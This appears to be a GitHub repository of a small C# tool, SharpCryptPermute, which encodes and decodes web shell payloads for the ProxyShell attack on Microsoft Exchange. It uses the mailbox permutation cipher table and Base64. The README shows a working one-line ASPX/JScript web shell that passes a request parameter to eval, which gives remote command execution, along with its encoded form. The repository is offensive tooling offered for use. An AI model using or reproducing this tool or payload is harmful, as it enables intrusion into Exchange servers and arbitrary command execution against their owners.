├── .gitattributes
├── README.md
├── SharpCryptPermute.sln
└── SharpCryptPermute
    ├── Program.cs
    ├── Properties
        └── AssemblyInfo.cs
    └── SharpCryptPermute.csproj


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SharpCryptPermute
 2 |  Crypt/Decrypt Proxyshell Payload
 3 | 
 4 | ```
 5 | >SharpCryptPermute.exe -enc aaa.aspx
 6 | [+] Encrypt String:
 7 | ldZUhrdpFDnNqQbf96nf2v+CYWdUhrdpFII5hvcGqRT/gtbahqXahoI5uanf2jmp1mlU041pqRT/FIb32tld9wZUFLfTBjm5qd/aKSDTqQ2MyenapanNjL7aXPfa1hR+glSNDYIPa4L3BtapXdqCyTEhlfvWVIa3aRTZ
 8 | 
 9 | >SharpCryptPermute.exe -dec ldZUhrdpFDnNqQbf96nf2v+CYWdUhrdpFII5hvcGqRT/gtbahqXahoI5uanf2jmp1mlU041pqRT/FIb32tld9wZUFLfTBjm5qd/aKSDTqQ2MyenapanNjL7aXPfa1hR+glSNDYIPa4L3BtapXdqCyTEhlfvWVIa3aRTZ
10 | [+] Decrypt  String:
11 | <script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script>
12 | ```


--------------------------------------------------------------------------------
/SharpCryptPermute.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 14
 4 | VisualStudioVersion = 14.0.25123.0
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpCryptPermute", "SharpCryptPermute\SharpCryptPermute.csproj", "{37C450BC-B514-4880-BC84-5C1721164380}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{37C450BC-B514-4880-BC84-5C1721164380}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{37C450BC-B514-4880-BC84-5C1721164380}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{37C450BC-B514-4880-BC84-5C1721164380}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{37C450BC-B514-4880-BC84-5C1721164380}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | EndGlobal
23 | 


--------------------------------------------------------------------------------
/SharpCryptPermute/Program.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Collections.Generic;
  3 | using System.IO;
  4 | using System.Linq;
  5 | using System.Text;
  6 | 
  7 | namespace SharpCryptPermute
  8 | {
  9 |     class Program
 10 |     {
 11 |         private static readonly byte[] mpbbCrypt =
 12 |         {
 13 |             65, 54, 19, 98, 168, 33, 110, 187,
 14 |             244, 22, 204, 4, 127, 100, 232, 93,
 15 |             30, 242, 203, 42, 116, 197, 94, 53,
 16 |             210, 149, 71, 158, 150, 45, 154, 136,
 17 |             76, 125, 132, 63, 219, 172, 49, 182,
 18 |             72, 95, 246, 196, 216, 57, 139, 231,
 19 |             35, 59, 56, 142, 200, 193, 223, 37,
 20 |             177, 32, 165, 70, 96, 78, 156, 251,
 21 |             170, 211, 86, 81, 69, 124, 85, 0,
 22 |             7, 201, 43, 157, 133, 155, 9, 160,
 23 |             143, 173, 179, 15, 99, 171, 137, 75,
 24 |             215, 167, 21, 90, 113, 102, 66, 191,
 25 |             38, 74, 107, 152, 250, 234, 119, 83,
 26 |             178, 112, 5, 44, 253, 89, 58, 134,
 27 |             126, 206, 6, 235, 130, 120, 87, 199,
 28 |             141, 67, 175, 180, 28, 212, 91, 205,
 29 |             226, 233, 39, 79, 195, 8, 114, 128,
 30 |             207, 176, 239, 245, 40, 109, 190, 48,
 31 |             77, 52, 146, 213, 14, 60, 34, 50,
 32 |             229, 228, 249, 159, 194, 209, 10, 129,
 33 |             18, 225, 238, 145, 131, 118, 227, 151,
 34 |             230, 97, 138, 23, 121, 164, 183, 220,
 35 |             144, 122, 92, 140, 2, 166, 202, 105,
 36 |             222, 80, 26, 17, 147, 185, 82, 135,
 37 |             88, 252, 237, 29, 55, 73, 27, 106,
 38 |             224, 41, 51, 153, 189, 108, 217, 148,
 39 |             243, 64, 84, 111, 240, 198, 115, 184,
 40 |             214, 62, 101, 24, 68, 31, 221, 103,
 41 |             16, 241, 12, 25, 236, 174, 3, 161,
 42 |             20, 123, 169, 11, 255, 248, 163, 192,
 43 |             162, 1, 247, 46, 188, 36, 104, 117,
 44 |             13, 254, 186, 47, 181, 208, 218, 61,
 45 |             20, 83, 15, 86, 179, 200, 122, 156,
 46 |             235, 101, 72, 23, 22, 21, 159, 2,
 47 |             204, 84, 124, 131, 0, 13, 12, 11,
 48 |             162, 98, 168, 118, 219, 217, 237, 199,
 49 |             197, 164, 220, 172, 133, 116, 214, 208,
 50 |             167, 155, 174, 154, 150, 113, 102, 195,
 51 |             99, 153, 184, 221, 115, 146, 142, 132,
 52 |             125, 165, 94, 209, 93, 147, 177, 87,
 53 |             81, 80, 128, 137, 82, 148, 79, 78,
 54 |             10, 107, 188, 141, 127, 110, 71, 70,
 55 |             65, 64, 68, 1, 17, 203, 3, 63,
 56 |             247, 244, 225, 169, 143, 60, 58, 249,
 57 |             251, 240, 25, 48, 130, 9, 46, 201,
 58 |             157, 160, 134, 73, 238, 111, 77, 109,
 59 |             196, 45, 129, 52, 37, 135, 27, 136,
 60 |             170, 252, 6, 161, 18, 56, 253, 76,
 61 |             66, 114, 100, 19, 55, 36, 106, 117,
 62 |             119, 67, 255, 230, 180, 75, 54, 92,
 63 |             228, 216, 53, 61, 69, 185, 44, 236,
 64 |             183, 49, 43, 41, 7, 104, 163, 14,
 65 |             105, 123, 24, 158, 33, 57, 190, 40,
 66 |             26, 91, 120, 245, 35, 202, 42, 176,
 67 |             175, 62, 254, 4, 140, 231, 229, 152,
 68 |             50, 149, 211, 246, 74, 232, 166, 234,
 69 |             233, 243, 213, 47, 112, 32, 242, 31,
 70 |             5, 103, 173, 85, 16, 206, 205, 227,
 71 |             39, 59, 218, 186, 215, 194, 38, 212,
 72 |             145, 29, 210, 28, 34, 51, 248, 250,
 73 |             241, 90, 239, 207, 144, 182, 139, 181,
 74 |             189, 192, 191, 8, 151, 30, 108, 226,
 75 |             97, 224, 198, 193, 89, 171, 187, 88,
 76 |             222, 95, 223, 96, 121, 126, 178, 138,
 77 |             71, 241, 180, 230, 11, 106, 114, 72,
 78 |             133, 78, 158, 235, 226, 248, 148, 83,
 79 |             224, 187, 160, 2, 232, 90, 9, 171,
 80 |             219, 227, 186, 198, 124, 195, 16, 221,
 81 |             57, 5, 150, 48, 245, 55, 96, 130,
 82 |             140, 201, 19, 74, 107, 29, 243, 251,
 83 |             143, 38, 151, 202, 145, 23, 1, 196,
 84 |             50, 45, 110, 49, 149, 255, 217, 35,
 85 |             209, 0, 94, 121, 220, 68, 59, 26,
 86 |             40, 197, 97, 87, 32, 144, 61, 131,
 87 |             185, 67, 190, 103, 210, 70, 66, 118,
 88 |             192, 109, 91, 126, 178, 15, 22, 41,
 89 |             60, 169, 3, 84, 13, 218, 93, 223,
 90 |             246, 183, 199, 98, 205, 141, 6, 211,
 91 |             105, 92, 134, 214, 20, 247, 165, 102,
 92 |             117, 172, 177, 233, 69, 33, 112, 12,
 93 |             135, 159, 116, 164, 34, 76, 111, 191,
 94 |             31, 86, 170, 46, 179, 120, 51, 80,
 95 |             176, 163, 146, 188, 207, 25, 28, 167,
 96 |             99, 203, 30, 77, 62, 75, 27, 155,
 97 |             79, 231, 240, 238, 173, 58, 181, 89,
 98 |             4, 234, 64, 85, 37, 81, 229, 122,
 99 |             137, 56, 104, 82, 123, 252, 39, 174,
100 |             215, 189, 250, 7, 244, 204, 142, 95,
101 |             239, 53, 156, 132, 43, 21, 213, 119,
102 |             52, 73, 182, 18, 10, 127, 113, 136,
103 |             253, 157, 24, 65, 125, 147, 216, 88,
104 |             44, 206, 254, 36, 175, 222, 184, 54,
105 |             200, 161, 128, 166, 153, 152, 168, 47,
106 |             14, 129, 101, 115, 228, 194, 162, 138,
107 |             212, 225, 17, 208, 8, 139, 42, 242,
108 |             237, 154, 100, 63, 193, 108, 249, 236
109 |         };
110 | 
111 |         public static void CryptPermute(byte[] pv, int cb, bool fEncrypt)
112 |         {
113 |             int idx = (fEncrypt ? 0 : 512);
114 |             int temp = 0;
115 | 
116 |             for (int pvIndex = 0; pvIndex < cb; pvIndex++)
117 |             {
118 |                 temp = pv[pvIndex];
119 |                 temp = temp & 0xFF;
120 |                 pv[pvIndex] = mpbbCrypt[temp + idx];
121 |             }
122 |         }
123 |         static void Main(string[] args)
124 |         {
125 |             string mod = args[0];
126 |             string filestring = args[1];
127 |             if (mod.Contains("-enc"))
128 |             {
129 |                 byte[] webshell = File.ReadAllBytes(filestring);
130 |                 int length = webshell.Length;
131 |                 CryptPermute(webshell, length, false);
132 |                 string str = Convert.ToBase64String(webshell);
133 |                 Console.WriteLine("[+] Encrypt String: \n{0}", str);
134 |             }
135 |             else if (mod.Contains("-dec"))
136 |             {
137 |                 byte[] webshell = Convert.FromBase64String(filestring);
138 |                 int length = webshell.Length;
139 |                 CryptPermute(webshell, length, true);
140 |                 string str = Encoding.Default.GetString(webshell);
141 |                 Console.WriteLine("[+] Decrypt  String: \n{0}", str);
142 |             }
143 | 
144 |         }
145 |     }
146 | }
147 | 


--------------------------------------------------------------------------------
/SharpCryptPermute/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // 有关程序集的一般信息由以下
 6 | // 控制。更改这些特性值可修改
 7 | // 与程序集关联的信息。
 8 | [assembly: AssemblyTitle("SharpCryptPermute")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpCryptPermute")]
13 | [assembly: AssemblyCopyright("Copyright ©  2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | //将 ComVisible 设置为 false 将使此程序集中的类型
18 | //对 COM 组件不可见。  如果需要从 COM 访问此程序集中的类型，
19 | //请将此类型的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 | 
22 | // 如果此项目向 COM 公开，则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("37c450bc-b514-4880-bc84-5c1721164380")]
24 | 
25 | // 程序集的版本信息由下列四个值组成: 
26 | //
27 | //      主版本
28 | //      次版本
29 | //      生成号
30 | //      修订号
31 | //
32 | //可以指定所有这些值，也可以使用“生成号”和“修订号”的默认值，
33 | // 方法是按如下所示使用“*”: :
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/SharpCryptPermute/SharpCryptPermute.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{37C450BC-B514-4880-BC84-5C1721164380}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <AppDesignerFolder>Properties</AppDesignerFolder>
10 |     <RootNamespace>SharpCryptPermute</RootNamespace>
11 |     <AssemblyName>SharpCryptPermute</AssemblyName>
12 |     <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
13 |     <FileAlignment>512</FileAlignment>
14 |   </PropertyGroup>
15 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 |     <PlatformTarget>AnyCPU</PlatformTarget>
17 |     <DebugSymbols>true</DebugSymbols>
18 |     <DebugType>full</DebugType>
19 |     <Optimize>false</Optimize>
20 |     <OutputPath>bin\Debug\</OutputPath>
21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
22 |     <ErrorReport>prompt</ErrorReport>
23 |     <WarningLevel>4</WarningLevel>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
26 |     <PlatformTarget>AnyCPU</PlatformTarget>
27 |     <DebugType>pdbonly</DebugType>
28 |     <Optimize>true</Optimize>
29 |     <OutputPath>bin\Release\</OutputPath>
30 |     <DefineConstants>TRACE</DefineConstants>
31 |     <ErrorReport>prompt</ErrorReport>
32 |     <WarningLevel>4</WarningLevel>
33 |   </PropertyGroup>
34 |   <ItemGroup>
35 |     <Reference Include="System" />
36 |     <Reference Include="System.Core" />
37 |     <Reference Include="System.Xml.Linq" />
38 |     <Reference Include="System.Data.DataSetExtensions" />
39 |     <Reference Include="System.Data" />
40 |     <Reference Include="System.Xml" />
41 |   </ItemGroup>
42 |   <ItemGroup>
43 |     <Compile Include="Program.cs" />
44 |     <Compile Include="Properties\AssemblyInfo.cs" />
45 |   </ItemGroup>
46 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
47 |   <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
48 |        Other similar extension points exist, see Microsoft.Common.targets.
49 |   <Target Name="BeforeBuild">
50 |   </Target>
51 |   <Target Name="AfterBuild">
52 |   </Target>
53 |   -->
54 | </Project>


--------------------------------------------------------------------------------